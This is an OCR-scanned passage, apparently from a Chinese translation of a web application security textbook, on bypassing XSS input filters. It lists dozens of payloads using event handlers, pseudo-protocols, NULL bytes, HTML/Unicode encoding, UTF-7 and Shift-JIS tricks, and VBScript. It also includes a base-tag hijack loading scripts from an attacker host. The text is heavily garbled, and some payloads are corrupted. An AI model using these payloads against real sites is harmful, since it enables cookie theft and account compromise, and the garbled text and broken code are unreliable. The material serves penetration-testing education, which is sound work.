是 否 仍 然 被 阻止 。 通 常 ， 使 用 这 种 方法 可 迅速 查 明 是 否 是 某 个 特殊 的 
表达 式 (如 <script>)〉 造成 请 求 被 阻止 。 如 果 确 实 如 此 ， 那 么 需要 对 过 
滤 进行 测试 ， 看 是 否 有 任何 避 开 过 滤 的 办 法 。 

有 各 种 不 同 的 方法 可 以 在 HIML 页面 中 引入 脚本 代码 ， 这 些 方法 通 
常 能够 避 开 基于 签名 的 过 滤 。 ee 
法 ， 要 么 使 用 浏览 器 接受 的 略 显 畸形 的 语法 。 在 这 一 市 中 ， 我 们 将 介 
各 种 执行 脚本 的 不 同方 法 ， 然 后 说 明 一 系列 可 用 于 避 开 常用 过 tate 
巧 。 








9 引入 脚本 代码 的 方法 

有 4 种 不 同 的 方法 可 用 于 在 HTML 页 面 中 引入 脚本 代码 。 我 们 将 逐 
see 并 提供 一 些 可 用 于 成 功 避 开 基 于 签名 的 输入 过 滤 的 特 
殊 示 例 。 
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=> 注解 浏览 器 对 于 各 种 HTML 和 脚本 语法 的 支持 各 不 相 
同 。 个 体 浏览 器 的 行为 也 往往 会 随 着 新 版 本 的 发 布 而 发 生 改 变 。 
此 ， 任 何 针对 个 体 浏 览 器 行为 的 “明确 ”指南 也 很 快 会 过 时 。 但 是 ， 
从 安全 的 角度 看 ， 应 用 程序 需要 在 所 有 当前 和 最 新 版 本 的 常用 浏览 
器 中 可 靠 运行 。 如 有 果 XSS 攻 击 只 能 通过 仅 由 少数 用 户 使 用 的 特定 浏 
览 句 进行 传送 ， 这 仍然 构成 一 个 漏洞 ， 应 对 其 予以 修复 。 到 本 书 截 





稿 时 止 ， 本 章 中 提供 的 所 有 示例 至 少 能 够 在 东 种 注 流 浏览 器 上 运 
行 。 





为 便于 参考 ， 本 章 于 2011 年 3 月 撰写 ， 所 有 描述 的 攻击 至少 能 
够 在 以 下 一 种 浏览 器 上 实施 : 

口 Internet Explorer 版 本 8.0.7600.16385 ; 

口 Firefox 版 本 3.6.15。 


9 脚本 标签 

除 直 接 使 用 <script> 标 签 外 ， 还 可 以 通过 各 种 方法 、 使 用 复杂 的 语 
法 来 隐藏 标签， 从 而 避 开 某 些 过 波 : 

<object Gata="Gata: text/html, <script>alert(1)</script>"> 

<object Gata=“data:text/html; baseé4, PHN) cmlwdDShbGVydCqxKTwvc2NyaxBOPo=--"> 

<a hrei="*data:text/html; base64, PHNjcmlwdDShbGVydCexkKTwvc2NyaxBOPq=="> 


Click here</a> 


上 例 中 的 基于 Base64 的 字符 串 为 : 
<script>alert (1)</script> 


V 事件 处 理 器 
有 大 量 事件 处 理 器 可 与 各 种 标签 结合 使 用 ， 以 用 于 执行 脚本 。 以 下 
是 一 些 较为 少见 的 示例 ， 可 在 不 需要 任何 用 户 交 互 的 情况 下 执行 脚本 : 
<xml onreadystatechange=alert{1)> 
<style onreadystatechange-alert (1})> 
<iframe onreadystatechange-alert(ij}> 
<object onerror=alert({1)> 
<object type=image sre=valid.cif onreadystatechange=alert (1)></object> 


<img type=imace src=valic.gif onreadystatechange=alert{1)> 


<input type=imace src=valid.gif onreadystatechange=alert(i)> 
<isindex type-image src=valid.gif onreadystatechnange=-alert{1)> 
<script onreadystatechange=alert(1)> 

<bgsound onpropertychance=alert[(1)}> 

<body onbeforeactivate=alert(i)}> 

<body onactivate=alert(1)> 

<body onfocusin=alert{1)}> 


HTML5 使 用 事件 处 理 器 提供 了 大 量 向 量 。 这 包括 使 用 autofocus 属 
性 目 动 触发 之 前 需要 用 户 交 互 的 事件 : 
<input autofocus onfocus=alert(1)> 
<input onblur=alert({1l) autofocus><input autofocus> 
<body onscroll=alert(1)><br><br>...<br><input autofocus> 








ETE EE R En SPE SP Ach EEAS : 


</a E T 
最 后 ，HTML5 还 通过 事件 处 理 器 引入 了 新 标签 : 


<video src=1 onerror=alert(1)> 
<audio src=1 onerror=alert(1)> 


V 脚本 伪 协 议 
脚本 伪 协 议 可 用 在 各 种 位 置 ， 以 在 需要 URL 的 属性 中 执行 行内 肢 
本 。 以 下 是 一 些 示 例 : 
<object data=javascript:alert(i)> 
<iframe src=javascript:alert(1)> 
<embed src=javascript:alert(1i)> 


虽然 上 面 的 示例 主要 使 用 的 是 javascript 伪 协议 ， 但 是 ， 还 可 以 在 
Internet Explorer 上 使 用 vbs 协 议 ， 如 本 章 后 面部 分 所 述 。 

和 事件 处 理 嚣 一样 ，HTML5 也 提供 一 些 在 XSS 攻 击 中 使 用 脚本 伪 协 
议 的 新 方法 : 


<form id=te <button form=test formaction=javascript:alert{1)}> 


<event-source src-javascript:al 


在 针 对 输入 过 滤 进 行 攻击 时 ， eet Source 标签 特别 有 用 。 与 之 
前 的 任何 HTML5 标 签 不 同 ， 它 的 名 和 Ree 因此 ， 使 用 
这 个 标签 可 以 避 开 传统 的 、 认 为 标签 名 称 只 能 包含 字母 的 基于 正则 表达 
式 的 过 滤 。 

V 动态 求 值 的 样式 

一 坚 浏览 器 文 持 在 动态 求 值 的 CSS 样 式 中 使 用 JavaScript。 以 下 示例 
Dee eee WIR TER ATESL Pir, H EJS 

行 : 











<x style=x:expression(alert(1))}> 


最 新 版 本 的 下 不 再 文 持 上 述 语法 ， 因 为 这 些 语法 只 能 用 在 XSS 攻 击 
中 。 但 是 ， 在 最 新 版 本 的 了 中 ， 使 用 以 下 请 求 可 以 达到 同样 的 效果 : 


<x style=behavior:url (t#default#time2} onbegin=alert (1)> 


使 用 Firefox 浏 览 器 可 以 通过 moz-binding 属 性 实施 基于 CSS 的 攻击 ， 








但 是 ， 由 于 应 用 程序 已 对 这 一 功能 实施 了 限制 ， 现 在 已 经 无 法 通过 它 来 
实施 XSS 攻 击 。 

Vv 避 开 过 滤 : HTML 

在 前 面 几 节 中 ， 我 们 介绍 了 各 种 可 用 于 在 HIML 页 面 中 执行 脚本 代 
码 的 方法 。 许 多 时 候 ， 你 会 发 现 ， 通 过 采用 不 同 的 、 较 为 少见 的 脚本 执 
行 方法 ， 就 可 以 避 开 基于 签名 的 过 滤 。 如 果 这 种 方法 失败 ， 你 束 需 要 寻 
找 其 他 隐藏 攻击 的 方法 。 通 党 ， 你 可 以 引入 过 滤器 接受 的 异 稍 语法 ， 并 
使 浏览 器 接受 返回 的 输入 。 在 本 节 中 ， 我 们 将 介绍 各 种 对 HTML 请 求 进 
行 模糊 处 理 以 避 开 常见 的 过 滤 的 方法 。 本 节 对 JavaScript 和 VBScript 语 法 
应 用 相同 的 原则 。 

旨 在 阻止 XSS 攻 击 的 基于 签名 的 过 滤 通 党 采用 正则 表达 式 或 其 他 技 
巧 来 确定 关键 的 HTML 组 件 ， 如 标签 括号 、 标 签名 称 、 属 性 名 称 和 属性 
值 。 例 如 ， 过 滤器 可 能 会 阻止 包含 使 用 已 知 可 用 于 引入 脚本 的 特殊 标签 
或 属性 名 称 的 HTML 的 输入 ， 或 试图 阻止 以 脚本 伪 协 议 开 头 的 属性 值 。 
通过 以 一 种 或 多 种 浏览 器 接受 的 方式 在 HTML 中 的 关键 位 置 插 入 不 常见 
的 字符 ， 可 以 避 开 其 中 的 许多 过 滤 。 

我 们 来 了 解 一 下 这 种 技巧 的 用 法 ， 以 下 面 这 段 简单 的 脚本 为 例 : 


<img onerror=alert(1) src=a> 


可 以 通过 各 种 方式 修改 这 段 脚本 ， 并 使 它 至 少 可 在 一 个 浏览 器 中 运 
行 。 下 面 我 们 将 分 别 介绍 这 些 方法 。 实 际 上 ， 你 可 能 需要 在 一 次 攻击 中 
结合 利用 其 中 的 几 种 技巧 ， 以 避 开 更 加 复杂 的 输入 过 滤 。 

V 标签 名 称 

从 起 始 标签 名 称 开始 ， 只 需 改变 所 使 用 字符 的 大 小 写 ， 即 可 避 开 最 
fia] AEE: 

















<iMg onerror=alert(1) src=a> 
更 进一步 ， 可 以 在 任何 位 置 插 入 NULL 字 市 : 


<[%00]img onerror=alert(1) src=a> 


<i[%00]mg onerror=alert(1) src=a> 


(在 以 上 示例 中 ，[%XX] 表 示 十 六 进 制 ASCII 代 码 XX 的 原 义 字符 。 
在 问 应 用 程序 实施 攻击 时 ， 通 常会 使 用 字符 的 URL 编 码 形式 。 在 查看 应 
用 程序 的 响应 时 ， 需 要 在 其 中 寻找 已 解码 的 原 义 字符 。) 








Vv 提示 ”NULL 字 节 技巧 可 用 在 Internet Explorer 上 的 HTML 页 
面 的 任何 位 置 。 在 XSS 攻 击 中 灵活 使 用 NULL 字 节 通 常 可 以 快速 避 
开 不 探查 正 行 为 的 基于 签名 的 过 滤 。 

事实 证 明 ， 使 用 NULL 字 节 可 以 有 效 避 开 配 置 为 阻止 包含 已 知 
攻击 字符 串 的 请 求 的 Web 应 用 程序 防火 墙 CWAF) 。 为 了 提高 性 
能 ，WAEF 通 冲 以 本 地 代码 编写 ， 因 此 ，NULL 字 节 将 终止 在 其 中 出 
现 的 字符 串 。 这 样 ，WAF 就 无 法 发 现 NULL 字 节 之 后 的 恶意 有 效 载 
和 荷 〈 请 参阅 第 16 章 了 解 详 细 信息 ) 。 


更 进一步 ， 如 果 你 对 上 面 示例 中 的 标签 名 称 稍 做 修改 ， 就 可 以 使 用 
任意 你 签名 称 引 入 事件 处 理 右 ， 从 而 避 开 仅仅 阻止 特定 标签 名 称 的 过 


JË: 





<x onclick=alert{1) src=a>Click here</x> 


有 时 ， 可 以 引入 不 同名 称 的 新 标签 ， 但 却 找 不 到 使 用 这 些 标签 直接 
执行 代码 的 方法 。 在 这 些 情 况 下 ， 可 以 使 用 一 种 称 为 “基本 标签 劫持 ”的 
技巧 来 实施 攻击 。<base> 标 签 用 于 指定 一 个 URL， 浏 览 右 应 使 用 该 URL 
解析 随后 在 页 面 中 出 现 的 任何 相对 URL。 如 果 可 以 引入 一 个 新 的 
<base>， 并 且 页 面 执行 反射 点 后 的 任何 使 用 相对 URL 的 <script>， 则 你 
就 可 以 指定 一 个 指 同 受 你 控制 的 服务 器 的 基本 URL。 当 浏览 器 加 载 在 
HTML 页 面 的 剩余 部 分 指定 的 脚本 时 ， 这 些 脚 本 将 从 指定 的 服务 器 加 
载 ， 但 仍然 能 够 在 调用 它们 的 页 面 中 执行 。 例 如 : 


<base href="http://mdattacker.net/badscripts/"> 





<script src="goodscript.js"></script> 


根据 规范 ，<base> 标 签 应 出 现在 HTML 页 面 的 <head> 部 分 。 但 是 ， 
一 些 浏览 器 ， 如 Firefox， 人 允许 <base> 标 签 出 现在 页 面 的 任何 位 置 ， 这 显 
著 扩 大 了 这 种 攻击 的 范围 。 

V 标签 名 称 后 的 空格 

一 些 字 符 可 用 于 蔡 代 标签 名 称 与 第 一 个 属性 名 称 之 间 的 空格 : 


<img/onerror=alert(1) src=a> 

<img [(%09]onerror=alert(1) src=a> 

<img [%0d] onerror=alert(1) src=a> 

<img [%0a]onerror=alert(1) src=a> 

<img/"“onerror=alert(1) src=a> 

<img/'onerror=alert(1) src=a> 

<img/anyjunk/onerror=alert(1) src=a> 

需要 注意 的 是 ， 即 使 在 实施 攻击 时 不 需要 任何 标签 属性 ， 仍 然 应 始 

i 
JOLIE: 





<script/anyjunk>alert (1)</script> 


V 属性 名 称 

也 可 以 在 属性 名 称 中 使 用 上 述 NULL 字 节 技 巧 。 这 样 做 可 以 避 开 许 
多 试图 通过 阻止 以 on 开头 的 属性 名 称 来 阻止 事件 过 滤器 的 简单 过 滤 : 

<img o[%00]nerror=alert(1) src=a> 

V 属性 分 隔 符 

在 最 初 的 示例 中 ， 属 性 值 之 间 并 未 分 隔 开 来 ， 因 而 需要 在 属性 值 后 
面 插入 一 些 空 格 ， 表 示 属 性 值 已 结束 ， 以 便于 添加 其 他 属性 。 属 性 可 以 
选择 使 用 双 引 号 或 单 引 号 进行 分 隔 ， 或 在 正 上 使 用 重音 符 分 隔 : 


<img onerror="alert(1)"src=a> 








<img onerror='alert(1)'src=a> 
<img onerror= alert(1) src=a> 
前 面 的 示例 提供 了 男 一 种 方法 ， 可 用 于 避 开 一 些 检查 以 on 开头 的 属 
性 名 称 的 过 滤器 。 如 果 过 滤器 不 知道 重音 符 被 用 作 属 性 分 隔 符 ， 它 会 将 
下面 的 示例 视 为 仪 包含 一 个 属性 ， 其 名 称 不 再 为 事件 处 理 器 的 名 称 : 





<img src= ‘a onerror=alert (1)> 


通过 使 用 引号 分 隔 的 属性 ， 并 在 标签 名 称 后 面 插入 异常 字符 ， 就 可 
以 设计 出 不 需要 使 用 任何 空格 的 攻击 ， 从 而 避 开 一 些 简 单 的 过 滤 : 





<img/onerror="alert(1)"src=a> 


Al, yn VW y 
笑 试 访问 
http://mdsec.net/search/69/ 


http://mdsec.net/search/72/ 
http://mdsec.net/search/75/ 


vV 属性 值 
在 属性 值 中 ， 可 以 使 用 NULL 字 节 技 巧 。 还 可 以 使 用 HTML 编 码 的 
字符 ， 如 下 所 示 : 


<img onerror=a[%00]Jlert(1) src=a> 
<img onerror=a&#x6c;ert(1) src=a> 
在 进一步 处 理 属 性 值 之 前 ， 浏 览 器 会 对 其 进行 HTML 解 码 ， 因 此 ， 


可 以 使 用 HIML 编 码 对 脚本 代码 进行 模糊 处 理 ， 从 而 避 开 任何 过 滤 。 例 
如 ， 以 下 攻击 避 开 了 许多 试图 阻止 JavaScript 伪 协议 处 理 器 的 过 滤 : 


<img onerror=a&#x06c;ert(1) src=a> 
<img onerror=a&#x006c;ert(1) src=a> 
<img onerror=a&#x0006c;ert({1) src=a> 
<img onerror=a&#108;ert(1) src=a> 
<img onerror=a&#0108;ert({1}) src=a> 
<img onerror=a&#108ert(1) src=a> 
<img onerror=a&#0108ert(1) src=a> 


FESEFSHTMLAWSI, (EERE, Das Re Se ME HY Bh Ae 
体 ， 甚 至 可 能 忽略 过 滤 需 “意识 到 ”的 HTML 编码 问题 。 可 以 使 用 十 进 制 
和 十 六 进 制 格式 ， 添 加 多 余 的 前 导 零 ， 并 省 略 结尾 的 分 号 。 以 下 示例 至 
少 可 以 用 在 一 种 浏览 器 中 : 


<iframe src=j&#x61;vasc&#x72ipt&#x3a;alerc&#x28; 1&#x29; > 


V 标签 括号 
有 些 时 候 ， 通 过 利用 奇怪 的 应 用 程序 或 浏览 右 行 为 ， 
无 效 的 标签 ne. JE LAG PR (Eo a FBC te HT ts A A AAP BA os A 











一 些 应 用 程序 在 应 用 输入 过 滤 后 还 执行 不 必要 的 URL 解 码 ， 因 此 ， 
请 求 中 的 以 下 输入 


S253cimg%20o0nerror=alert (1)%20src=a%253e 


被 应 用 程序 服务 器 进行 URL 人 解码 ， 然 后 将 以 下 输入 传递 给 应 用 程序 : 
$3cimg onerror=alert(1) src=a%3e 


其 中 并 不 包含 任何 标签 括号 ， 因 此 不 会 被 输入 过 小 阻止 。 但 是 ， 应 
用 程序 随后 会 执行 第 二 次 URL 解 码 ， 因 此 输入 将 变 为 : 


<img onerror=alert(1) src=a> 


该 输入 会 回 显 给 用 户 ， 导 致 攻击 得 以 实施 。 

如 第 2 章 所 述 ， 如 果 应 用 程序 框架 基于 字形 和 发 音 的 相似 性 ， 将 不 
常见 的 Unicode 字 符 “ 转 换 ” 为 它们 最 接近 的 ASCII 字 符 ， 这 时 可 能 会 出 现 
与 上 述 示例 类 似 的 情况 。 例 如 ， 以 下 输入 使 用 Unicode 双 角 引 号 
(%u00AB 和 %u00BB) ， 而 不 是 标签 括号 : 


«img onerror=alert(1}) src=a» 


应 用 程序 的 输入 过 滤 可 能 会 允许 该 输入 ， 因 为 其 中 并 不 包含 任何 有 
问题 的 HTML。 但 是 ， 如 果 应 用 程序 框 染 在 输入 被 插入 到 啊 应 中 时 将 引 
号 转换 为 标签 字符 ， 攻 击 将 取得 成 功 。 事 实证 明 ， 由 于 开发 者 的 压 忽 ， 
大 量 应 用 程序 都 易于 受到 这 种 攻击 。 

一 些 输入 过 滤 通 过 简单 地 匹配 起 始 和 结束 尖 插 号 ， 提 取 内 容 ， 并 将 
0 尔 黑 名 单 进行 比较 来 识别 HTML 标 签 。 在 这 种 情况 下 ， 可 以 

通过 使 用 多 余 的 括号 (如果 浏览 器 接受 ) 来 避 开 过 小 : 


<<script>alert (1);//<</scrip 


某 些 情况 下 ， 可 以 利用 浏览 器 的 HTML 解析 器 的 异常 行为 来 实施 攻 
击 ， 从 而 避 开 应 用 程序 的 输入 过 滤 。 例如， 以 下 HTML 使 用 了 
ECMAScript for XML(E4X)， 其 中 并 不 包含 有 效 的 起 始 脚 本 标签 ， 但 仍 
然 可 以 在 当前 版 本 的 Firefox 中 执行 包含 的 脚本 : 


<script<{alert(1)}/></script> 


YY 提示 在 上 述 用 于 避 开 过 滤 的 各 种 技巧 中 ， 实 施 攻击 的 
HTMEL 虽 然 存 在 缺陷 ， 但 仍 被 客户 端 浏览 器 所 接受 。 由 于 有 大 量 相 
当 合 法 的 网 站 包含 并 不 严格 遵循 标准 的 HTML， 这 导致 浏览 器 接受 
各 种 各 样 存在 问题 的 HTML。 在 呈现 页 面 之 前 ， 这 些 浏 览 器 会 在 后 
台 有 效 地 修复 相关 错误 。 通 常 ， 在 反常 情况 下 尝试 调整 攻击 方式 
时 ， 查 看 浏览 器 基于 服务 器 的 具体 啊 应 构建 的 虚拟 HTML 会 有 所 帮 
助 。 在 Firefox 中 ， 可 以 使 用 WebDeveloper 工 具 ， 该 工具 提供 的 “ 查 
看 生成 的 源 ”(View Generated Source) Jf 正好 可 用 于 完成 上 述 术 任 
务 。 


V FITR 

有 些 时 候 可 以 使 用 一 种 非常 强大 的 方法 ， 致 使 应 用 程序 接受 攻击 有 
效 载荷 的 非 标 准 编 合 ， 从 而 避 开 各 种 类 型 的 过 滤 。 下 面 的 示例 说 明了 字 
符 串 <script>alert(document.cookie)</script> 的 一 些 非 标准 编码 表示 法 : 

UTF-7 


+ADw-script+AD4-alert (document .cookie) +ADw-/script+AD4- 

















BC 73 63 72 69 70 74 BE 61 6C 65 72 74 28 64 6F ; %Scriptkalert (do 
63 75 6D 65 6E 74 2E 63 6F 6F 6B 69 65 29 BC 2F ; cument.ccokie)%/ 
73 63 72 69 70 74 BE ; script% 

FF FE 3C 63 í 69 © if) 74 í 和 Coe. 
3E 00 61 GS 65 2 å d 28 ( 64 ( 1 rs = | 
BF 00 63 00 75 00 óD 00 65 OO GE Q0 74 OO 2E 00 : o.c.u.m.e.n.t 

63 4 F 00 6B 00 69 00 65 00 29 | 0 

© 0 © 


00 69 00 


这 些 编码 后 的 字符 叫 可 如 开 许多 常见 的 反 XSS 过 滤 . 实施 成 功 攻击 
的 挑战 在 于 如 何 使 浏览 器 使 用 所 需 的 字符 集 来 解释 响应 。 如 果 你 控制 了 
HTTP Content- Type 消息 头 或 其 对 应 的 HTML 元 标签 ， 就 可 以 使 用 非 标 
准 字 符 集 避 开 应 用 程序 的 过 滤 ， 使 浏览 器 按照 需要 的 方式 解释 有 效 载 
和 荷 。 一 些 应 用 程序 在 某 些 请 求 中 提交 charset 参 数 ， 人 允许 直接 设置 在 应 用 
程序 的 响应 中 使 用 的 字符 集 。 

如 果 应 用 程序 默认 使 用 多 字 市 字符 集 ， 如 Shift-JIS， 这 时 ， 可 以 通 

过 提交 在 所 采用 的 字符 集中 具有 特殊 意义 的 字符 来 避 开 某 些 输入 过 滤 。 




















例如 ， 假 设 应 用 程序 的 啊 应 中 返回 了 以 下 两 段 用 户 输入 : 
<img src="image.gif* alt="[input1]"* /> ... [input2] 


对 于 inputl1， 应 用 程序 会 阻止 包含 引号 的 输入 ， 以 防止 攻击 者 终止 
引用 的 属性 。 对 于 input2， 应 用 程序 会 阻止 包含 尖 括 号 的 输入 ， 以 防止 
攻击 者 使 用 任何 HTML 标 签 。 这 种 过 滤 似 乎 较为 可 徘 ,， 但是， 攻击 者 可 
以 通过 使 用 以 下 两 个 输入 来 实施 攻击 : 


input1l: [%£0] 
input2: "onload=alert (1); 


在 Shift-JIS 字 符 集 中 ， 各 种 原始 字 节 值 〈 包 括 0xf0) 用 于 表示 由 该 
字 节 及 随后 的 字 节 组 成 的 2 字 节 字符 。 因 此 ， 浏 览 器 在 处 理 input1l 时 ， 
0xf0 字 节 后 面 的 引号 将 被 解释 为 一 个 2 字 节 字符 的 一 部 分 ， 而 不 是 属性 
值 的 分 隔 符 。HTML 解 析 器 将 继续 运行 ， 直 到 到 达 input2 提 供 的 引号 位 
A (该 引号 终止 了 属性 ) ， 从 而 允许 攻击 者 提交 将 作为 其 他 标签 属性 解 
REY SEP ADEE AS 


<img src="image.gif" alt="? /> ... “onload=alert(1); 


在 广泛 使 用 的 字符 集 UTF-8 中 发 现 这 种 漏洞 时 ， 浏 览 占 供应 商 发 布 
了 一 个 补丁 ， 阻 止 了 相关 攻击 。 但 是 ， 这 些 攻 击 当 前 仍然 能 够 在 某 些 浏 
览 器 上 成 功 实施 ， 它 们 主要 针对 是 其 他 一 些 较 少 使 用 的 多 字 节 字符 集 ， 
包括 Shift-JIS、EUC-JP 和 BIG5。 

@ 避 开 过 滤 : 脚本 代码 

某 些 情况 下 ， 可 以 找到 办 法 来 操纵 反射 型 输入 ， 从 而 在 应 用 程序 的 
啊 应 中 插入 脚本 。 但 是 ， 可 能 会 遇 到 各 种 其 他 障碍 ， 无 法 执行 实施 有 效 
攻击 所 需 的 代码 。 这 时 ， 遇 到 的 过 滤 通 常会 试图 阻止 你 使 用 某 些 
JavaScript 关 键 字 和 其 他 表达 式 。 它 们 还 可 能 阻止 有 用 的 字符 ， 如 引号 、 
括号 和 圆 点 。 

和 使 用 HTML 对 攻击 进行 模糊 处 理 一 样 ， 也 可 以 通过 使 用 各 种 技巧 
来 修改 所 需 的 脚本 代码 ， 以 避 开 常见 的 输入 过 滤 。 

Vv 使 用 JavaScript 转 义 
A 0 
、 ae. 

Unicode 转 义 可 用 于 表示 JavaScript 关 键 字 中 的 字符 ， 从 而 避 开 许多 
类 型 的 过 滤 : 

















<script>a\u006cert (1) ;</script> 
如 条 能 够 使 用 eval 命 令 〈 通 过 利用 之 前 介绍 的 技 马 来 转 义 它 的 东 些 
字符 ) ， 就 可 以 将 其 他 命令 以 字符 串 格 式 传送 给 eval 命 令 ， 从 而 执行 这 
些 命令 。 这 样 ， 就 可 以 利用 各 种 字符 串 操 纵 技巧 来 隐藏 执行 的 命令 。 
“ee 可 以 使 用 Unicode 转 义 、 十 六 进 制 转 义 和 八 
Sk RE Y.: 


<script>eval('a\u006cert (1)')};</script> 
<script>eval('a\x6cert(1)');</script> 
<script>eval('a\154ert(1)');</script> 


此 外 ， 字 符 串 中 的 多 余 转 义 字 符 将 被 忽略 : 


<script>eval('a\l\ert\(1\)');</seript> 





V 动态 构建 字符 串 

可 以 使 用 其 他 技巧 来 动态 构建 在 攻击 中 使 用 的 字符 串 : 
<script>eval('al'+'ert(1)'):</script> 
<script>eval (String. fromCharCode({97,108,101,114 6,40,49,41));</seript> 
<script>eval (atop( 'amF2YXNj cmiwcDphbGVydaC¢xkQ' ) ) /script> 


上 面 的 示例 可 在 Firefox 上 执行 ， 可 以 通过 它 解 码 Base64 编 码 的 命 
令 ， 然 后 将 其 传递 给 eval。 


VY 蔡 代 eval 的 方法 
np RAE BE eval 命 令 ， 可 以 通过 其 他 方法 以 字符 串 格 式 执行 
HWY: 


BC 73 63 72 69 70 74 BE 61 6C 65 72 74 28 64 6F ; ‘“*scriptkalert (da 


V BREA 
如 果 圆 点 被 阻止 ， 可 以 使 用 以 下 方法 解 引用 : 
<script>alert (document ['cookie'])</script> 


<script>with (document) alert (cookie) </script> 


V 组 合 多 种 技巧 

到 现在 为 止 ， 我 们 介绍 的 各 种 技巧 通常 都 可 以 组 合 使 用 ， 以 对 攻击 
进行 多 层 模糊 处 理 。 在 HTML 标 签 属性 中 使 用 JavaScript (通过 事件 处 理 
器 、 脚 本 伪 协 议 或 动态 求 值 的 样式 〉 的 情况 下 ， 可 以 将 这 些 技巧 与 
HTML 编 码 组 合 使 用 。 浏 览 器 会 对 标签 属性 值 进 行 HTML 人 解码 ， 然 后 再 


解释 其 中 包含 的 JavaScript。 在 下 面 的 示例 中 ，alert 中 的 e 字 符 使 用 
Unicode 转 义 方 法 进行 了 转 义 ， 并 且 Unicode 转 义 中 使 用 的 反 斜 线 经 过 了 
HTML 编 码 : 

<img onerror=eval({'al&#x5c;u0065rt(1)') SrC=a> 


当然 ， 还 可 以 对 onerror 属 性 值 中 的 任何 其 他 字符 进行 HTML 编 码 ， 
以 进一步 隐藏 攻击 : 


cimg onerror=&#x65;&#x76; &#x61; &éx60; Ax; &HK2AT ;lt#x5c; vuI0Srtt#x23:; 1h 


使 用 这 种 技巧 可 以 避 开 许多 针对 JavaScript 代 码 的 过 滤 ， 因 为 可 以 避 
免 使 用 任何 JavaScript 关 键 字 或 其 他 语法 ， 如 引号 、 名 号 和 括号 。 

vV 使 用 VBScript 

常见 的 XSS 攻 击 通 常 主要 i 通过 JavaScript 来 实施 ， 但 是 ， 在 Internet 
Explorer 上， 还 可 以 使 用 VBScript 语 言 。 该 语言 使 用 不 同 的 语法 和 其 他 
属性 ， 攻 击 者 可 以 对 其 加 以 利用 ， 以 避 开 许多 仅 针 对 JavaScript 的 输入 过 


Vis 
可 以 通过 各 种 方式 插入 VBScript 代 码 ， 如 下 所 示 : 
<script language=vbs>MsgBox 1</script> 
<img onerror="vbs:MsgBox 1" src=a> 
<img onerror=MsgBox+1l language=vbs src=a> 


无 论 是 哪 一 种 情况 ， 都 可 以 使 用 vbscript 〈 而 不 是 vbs) KSEE 
言 。 请 注意 ， 最 后 一 个 示例 使 用 了 MsgBox+1， 以 避免 使 用 空白 符 ， 因 
而 也 不 需要 在 属性 值 周围 加 上 引号 。 这 样 做 之 所 以 可 行 ， 是 因为 +1 有 效 
地 给 “空白 ”加 上 了 数字 1， 因 此 表达 式 的 求 值 结果 为 1;， 随 后， 这 一 结 
被 传递 给 MsgBox 函 数 。 

值得 注意 的 是 ， 如 前 面 的 示例 所 示 ， 在 VBScript 中 ， 一 些 函 数 无 须 
使 用 括号 即 可 调用 。 如 果 过 滤 机 制 认 为 必须 使 用 括号 才能 访问 函数 ， 怠 
可 以 通过 使 用 VBScript 来 避 开 这 些 过 滤 。 

此 外 ， 与 JavaScript 个 同 ， VBScript 语 言 个 区 分 大 小 写 ， 因 此 ， 可 以 
在 所 有 关键 字 和 函数 名 称 中 使 用 大 写 和 小 写字 符 。 如 果 你 所 攻击 的 应 用 
程序 函数 会 修改 输入 的 大 小 写 ， 如 将 其 转换 为 大 号， 这 时 VBScript 就 特 

别 有 有 用。 虽然 应 用 程序 将 输入 转换 为 大 写 的 做 法 主要 是 出 于 功能 而 不 是 
安全 考虑 ， 但 这 样 做 却 可 以 挫败 使 用 JavaScript 代 码 的 XSS 攻 击 ， 因 为 转 
代码 将 无 法 执行 。 与 之 相反 ， 使 用 VBScript 代 码 的 攻击 仍 
WAAR: 


























<SCRIPT LANGUAGE=VBS>MSGBOX 1</SCRIPT> 
<IMG ONERROR="VBS:MSGBOX 1" SRC=A> 
V 组 合 JavaScript 和 VBScript 


为 进一步 增加 攻击 的 复杂 程度 ， 并 避 开 某 些 过 滤 ， 可 以 从 JavaScript 
中 调用 VBScript， 或 从 VBScript 中 调用 JavaScript: 


<script>execScript ("MsgBox 1","vbscript");</script> 








<script language=vbs>execScript ("alert (1)")}</seript> 
FEAR UREK, FR A Ee] i RA : 

<script>execScript ('execScript 

"alert(1)","javascript"', "vbscript") ;</script> 


如 上 所 述 ，VBScript 不 区 分 大 小 写 ， 即 使 输入 被 转换 为 大 写 ， 你 的 
代码 仍然 可 以 执行 。 在 这 些 情况 下 ， 如 过 你 确实 项 望 调用 JavaScript 消 
数 ， 可 以 使 用 VBScript 中 的 字符 串 操 纵 函 数 用 所 需 的 大 /小 写 构 建 一 个 命 
令 ， 并 使 用 JavaScript 执 行 该 命令 : 

<SCRIPT LANGUAGE-VBS>EXECSCRIPT(LCASE(*ALERT(1)")) </SCRIPT> 
<IMG ONERROR="VBS:EXECSCRIPT LCASE('ALERT(1)'})" SRC=A> 

V 使 用 经 过 编码 的 脚本 

在 Internet Explorer 上 ， 可 以 使 用 Microsoft 的 定制 脚本 编码 算法 来 隐 
藏 脚本 的 内 容 ， 从 而 避 开 某 些 输 入 过 滤 : 


<img onerror="VBScript .Encode: #@~*CAAAAA==\koSK6, FoQIAAA==*4~@" Src=a> 
<img language="JScript.Encode" onerror="#8~-“CAAAAA==C*+.D° S#mqglAAA==*#~@" 
src=a> 





这 种 编码 最 初中 在 用 于 防止 用 户 通 过 查看 HTML 页 面 的 源 代 码 来 轻 
松 访问 客户 端 脚 本 。 此 后 ， 访 算法 被 人 们 和 破解， 而且 ， 可 以 通过 各 种 工 
具 和 网 站 来 解码 经 过 编码 的 脚本 。 通 过 Microsoft 的 旧版 Windows 中 的 命 
oo 工具 srcenc， 你 可 以 对 自己 的 脚本 进行 编码 ， 以 用 于 实施 攻 


5. 避 开 净化 

当 尝 试 利用 潜在 的 XSS 漏 洞 时 ， 避 开 妾 化 可 能 是 所 有 障碍 中 最 为 常 
见 的 一 种 。 这 时 ， 应 用 程序 对 攻击 字符 串 执 行 某 种 净化 或 编码 ， 使 其 变 
得 无 害 ， 防 止 它 执行 JavaScript。 

对 传送 攻击 所 需 的 某 些 关键 字符 进行 HTML 编码 《〈 因 此 < 变 成 
&Lti, > 变 成 &9t; ) 是 应 用 程序 实行 数据 净化 最 常见 的 做 法 。 其 他 情 








Se eee ey eee 
恶意 内 容 。 

如 果 过 到 这 种 防御 ， 首 先 应 查 明 应 用 程序 净化 哪些 字符 与 表达 式 ， 
以 及 是 否 仍 然 可 通过 剩 下 的 字符 实施 攻击 。 例 如 ， 如 果 输 入 的 数据 被 直 
接 插 入 到 现 有 的 一 段 脚 本 中 ， 那 么 可 能 不 需要 使 用 任何 HTML 标 签字 
